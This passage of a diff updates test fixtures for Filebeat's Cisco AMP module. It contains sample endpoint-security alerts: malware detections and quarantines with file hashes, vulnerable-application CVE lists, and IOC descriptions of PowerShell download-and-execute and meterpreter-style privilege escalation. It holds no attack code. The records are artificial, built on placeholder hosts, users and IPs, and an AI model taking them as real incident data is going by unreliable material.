], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "cfdd16225e67471f5ef54cab9b3a5558", + "file.hash.sha1": 
"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c", + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "file.name": "OLD.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52332, + "process.hash.md5": "38ae1b3c38faef56fe4907922f0385ba", + "process.hash.sha1": "84123a3decdaa217e3588a1de59fe6cee1998004", + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "process.name": "explorer.exe", + "process.pid": 2632, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "cfdd16225e67471f5ef54cab9b3a5558", + "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + 
"event.severity": 2, + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 53947, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.F2863A.211556.in02", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "c624d61b8f076c3ef05f74eeb96c8954", + "file.hash.sha1": "7d9518ea3f98d037745352b23861fab05d3777dc", + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "file.name": "twhy.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": 
"user@testdomain.com", + "input.type": "log", + "log.offset": 55057, + "process.hash.md5": "92f44e405db16ac55d97e3bfe3b132fa", + "process.hash.sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", + "process.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "process.name": "powershell.exe", + "process.pid": 4868, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "c624d61b8f076c3ef05f74eeb96c8954", + "7d9518ea3f98d037745352b23861fab05d3777dc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 56674, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 516130000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132516139000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 57784, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + 
"related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 474861000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132474871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 59541, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + 
"8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:27.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384389977, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:27.000Z", + "file.hash.sha256": "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 61194, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": 
"cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384371995, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:26.000Z", + "file.hash.sha256": "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 62768, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" 
+ ] + }, + { + "@timestamp": "2020-12-25T04:32:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2017-0106", + "CVE-2017-11774", + "CVE-2017-8506", + "CVE-2017-8507", + "CVE-2017-8571", + "CVE-2017-8663", + "CVE-2018-0791" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2017-0106", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106", + "version": "2016" + }, + { + "cve": "CVE-2017-11774", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774" + }, + { + "cve": "CVE-2017-8506", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506" + }, + { + "cve": "CVE-2017-8507", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507" + }, + { + "cve": "CVE-2017-8571", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571" + }, + { + "cve": "CVE-2017-8663", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663" + }, + { + "cve": "CVE-2018-0791", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193366641599, + "event.kind": "alert", + "event.module": "cisco", + 
"event.severity": 1, + "event.start": "2020-12-25T04:32:53.000Z", + "file.hash.sha256": "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc", + "file.name": "OUTLOOK.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 64342, + "process.hash.sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243", + "related.hash": [ + "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:22:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 878000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6525498672153625000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 66455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:07:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", 
+ "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696715, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.clean": true, + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.scan.malicious_detections": 0, + "cisco.amp.scan.scanned_files": 2872, + "cisco.amp.scan.scanned_paths": 0, + "cisco.amp.scan.scanned_processes": 49, + "cisco.amp.timestamp_nanoseconds": 928000000, + "event.action": "Scan Completed, No Detections", + "event.dataset": "cisco.amp", + "event.id": 6525494703603843000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 67379, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:06:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696714, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.timestamp_nanoseconds": 537000000, + "event.action": "Scan Started", + "event.dataset": "cisco.amp", + "event.id": 6525494527510184000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 68455, + "related.hosts": [ + "Demo_AMP_Intel" + ], 
+ "related.ip": [
+ "8.8.8.8",
+ "10.10.10.10"
+ ],
+ "service.type": "cisco",
+ "tags": [
+ "cisco-amp",
+ "forwarded"
+ ]
+ }
+]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log
index ed37c533eac..ae6c21d78ff 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log
@@ -10,14 +10,6 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":14000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671380737589000,"timestamp":1610706458,"timestamp_nanoseconds":605000000,"date":"2021-01-15T10:27:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":81000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat 
